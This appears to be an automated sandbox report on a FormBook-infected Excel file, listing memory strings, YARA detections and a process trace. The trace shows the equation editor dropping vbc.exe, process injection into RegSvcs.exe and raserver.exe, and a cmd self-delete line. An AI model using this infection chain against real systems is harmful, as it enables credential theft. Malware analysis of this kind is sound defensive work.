            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
            Source: explorer.exe, 00000006.00000000.2200577415.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
            Source: explorer.exe, 00000006.00000000.2197607706.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
            Source: explorer.exe, 00000006.00000000.2198231538.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
            Source: explorer.exe, 00000006.00000000.2198231538.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
            Source: explorer.exe, 00000006.00000000.2197607706.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
            Source: explorer.exe, 00000006.00000000.2209306525.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
            Source: explorer.exe, 00000006.00000000.2192186293.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2198231538.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/

            E-Banking Fraud:

            Yara detected FormBook
            Source: Yara match, File source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 5.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 5.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE

            System Summary:

            Malicious sample detected (through community Yara rule)
            Source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 5.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 5.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
            Source: Screenshot number: 4, Screenshot OCR: document is protected " t9 19 20 21 22 23 Open the document in If this document was 24 Mkroso
            Office equation editor drops PE file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\Public\vbc.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
            Source: C:\Users\Public\vbc.exe, Memory allocated: 76E20000 page execute and read and write
            Source: C:\Users\Public\vbc.exe, Memory allocated: 76D20000 page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Memory allocated: 76E20000 page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Memory allocated: 76D20000 page execute and read and write
            Source: C:\Windows\SysWOW64\raserver.exe, Memory allocated: 76E20000 page execute and read and write
            Source: C:\Windows\SysWOW64\raserver.exe, Memory allocated: 76D20000 page execute and read and write
            Source: C:\Windows\SysWOW64\cmd.exe, File deleted: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: Booking Confirmation.xlsx, OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: explorer.exe, 00000006.00000000.2197440508.0000000003C40000.00000002.00000001.sdmp, Binary or memory string: .VBPud<_
            Source: classification engine, Classification label: mal100.troj.expl.evad.winXLSX@9/6@5/3
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\Desktop\~$Booking Confirmation.xlsx
            Source: C:\Users\Public\vbc.exe, Mutant created: \Sessions\1\BaseNamedObjects\JhCZAcEj
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Temp\CVRBB3.tmp
            Source: C:\Users\Public\vbc.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File read: C:\Users\desktop.ini
            Source: C:\Users\Public\vbc.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\explorer.exe, File read: C:\Windows\System32\drivers\etc\hosts
            Source: Booking Confirmation.xlsx, Virustotal: Detection: 31%
            Source: Booking Confirmation.xlsx, ReversingLabs: Detection: 25%
            Source: unknown, Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
            Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Source: unknown, Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
            Source: unknown, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: unknown, Process created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
            Source: unknown, Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
            Source: C:\Users\Public\vbc.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Windows\SysWOW64\raserver.exe, Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
            Source: C:\Windows\explorer.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32
            Source: Window Recorder, Window detected: More than 3 window changes detected
            Source: C:\Users\Public\vbc.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
            Source: Booking Confirmation.xlsx, Static file information: File size 2169344 > 1048576
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: Binary string: RAServer.pdb^ source: RegSvcs.exe, 00000005.00000002.2218050010.00000000003D0000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: RegSvcs.exe, raserver.exe
            Source: Binary string: RAServer.pdb source: RegSvcs.exe, 00000005.00000002.2218050010.00000000003D0000.00000040.00000001.sdmp
            Source: Binary string: RegSvcs.pdb source: raserver.exe, 00000007.00000002.2378949879.000000000245F000.00000004.00000001.sdmp
            Source: Booking Confirmation.xlsx, Initial sample: OLE indicators vbamacros = False
            Source: Booking Confirmation.xlsx, Initial sample: OLE indicators encrypted = True
            Source: C:\Users\Public\vbc.exe, Code function: 4_2_00E86178 pushad ; ret 4_2_00E86188
            Source: C:\Users\Public\vbc.exe, Code function: 4_2_00E85A4C push edx; iretd 4_2_00E85A51
            Source: C:\Users\Public\vbc.exe, Code function: 4_2_00E85219 push ss; retf 4_2_00E8521A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_004169BB push esi; ret 5_2_004169BC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_0040AB07 push ds; retf 5_2_0040AB09
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_00414E05 push ss; retf 5_2_00414E06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_0041CEF2 push eax; ret 5_2_0041CEF8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_0041CEFB push eax; ret 5_2_0041CF62
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_0041CEA5 push eax; ret 5_2_0041CEF8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_0041CF5C push eax; ret 5_2_0041CF62
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 5_2_0091DFA1 push ecx; ret 5_2_0091DFB4
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01F7DFA1 push ecx; ret 7_2_01F7DFB4
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_001369BB push esi; ret 7_2_001369BC
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_0012AB07 push ds; retf 7_2_0012AB09
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_00134E05 push ss; retf 7_2_00134E06
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_0013CEA5 push eax; ret 7_2_0013CEF8
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_0013CEF2 push eax; ret 7_2_0013CEF8
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_0013CEFB push eax; ret 7_2_0013CF62
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_0013CF5C push eax; ret 7_2_0013CF62
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 7_2_01E6E3E6 pushad ; ret 7_2_01E6E3E7
            Source: initial sample, Static PE information: section name: .text entropy: 7.23266199922
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\Public\vbc.exe
